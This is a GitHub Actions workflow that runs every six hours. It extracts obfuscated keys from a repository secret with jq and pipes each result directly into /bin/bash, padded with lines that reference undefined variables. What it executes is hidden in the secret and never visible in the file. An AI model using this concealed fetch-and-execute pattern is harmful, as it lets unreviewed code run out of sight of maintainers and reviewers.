name: pojianshisi
on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pojianshisi
        env:
          mb3: ${{ secrets.mb3 }}
        run: |
          echo $mb3 | jq -r .buym31642 | /bin/bash
          echo $lmz904 | jq -r .tn5 | /bin/bash
          echo $b412 | jq -r .hsoj33864 | /bin/bash
          echo $ohsm6409 | jq -r .o97 | /bin/bash
          echo $ysjn091 | jq -r .awj6746 | /bin/bash
          echo $frgb906 | jq -r .jjqwk923 | /bin/bash
          echo $sg32 | jq -r .ow1 | /bin/bash
          echo $ldyoc810 | jq -r .ly13 | /bin/bash
          echo $ggjm52168 | jq -r .ftr093 | /bin/bash
          echo $jct7888 | jq -r .r20089 | /bin/bash
          echo $gjdl6445 | jq -r .g26 | /bin/bash
          echo $idr809 | jq -r .xilm4540 | /bin/bash
          echo $s3097 | jq -r .pmebe56 | /bin/bash
          echo $wt70 | jq -r .r782 | /bin/bash

